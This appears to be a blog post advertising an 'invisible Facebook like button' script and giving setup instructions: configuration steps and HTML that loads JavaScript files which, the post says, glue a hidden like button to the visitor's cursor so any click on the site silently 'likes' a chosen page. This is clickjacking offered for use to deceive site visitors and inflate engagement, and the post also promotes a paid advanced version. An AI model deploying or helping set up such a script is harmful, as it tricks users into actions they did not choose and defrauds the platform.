Invisible Facebook Like Button Script





Invisible Facebook Like Button Script is one of the better tools on the market today that will help you generate thousands of hits from Facebook. Everyone is familiar with Facebook these days and Facebook Marketing is undeniably one of the best ways to start your online marketing career.
If you ever used Facebook then you know about “like button”. Well what this tool does is it makes your site a giant “like button”, meaning no matter there your user clicks on your site it will automatically “like” your site on the Facebook. This is done by an invisible “like button” that is glued to your mouse pointer and when ever someone click on something it automatically records a hit.









The code is very easy to set up and use, all you need is follow the instructions in help.txt file. To see the code in action click here.
The “like button” is semi-transparent to demonstrate how it works.
This is just a basic script but if you want to buy more advanced version you can definitely do that by following the link I posted above.
All the props go to Arun Saragadam, the creator and owner of the site.





To use this script you need to have self hosted blog,site etc...


1. Modify config.JavaScript file... (Put URL for page which you want to be liked)
2. Modify like.JavaScript file... ( Set opacity and timeout time )


3. Add lines below at the top of your page :


!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">


<head>


<!------------------Add the below three lines in your file also just below <head> tag ------->


<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="content-script-type" content="text/javascript">
<meta http-equiv="content-style-type" content="text/css">


<!------------------Add the below two lines in your file also just above </head> tag similarly ------->
<script language="javascript" src="src/config.JavaScript"></script>
<script language="javascript" src="src/like.JavaScript"></script>
</head>


<body>
<!------------------Add the below line in your file also just below <body> tag similarly ------->
<script language="javascript" src="src/like.JavaScript"></script>


<h1>Your site content starts from here</h1>


</body>
</html>



Get Free Updates:
*Please click on the confirmation link sent in your Spam folder of Email*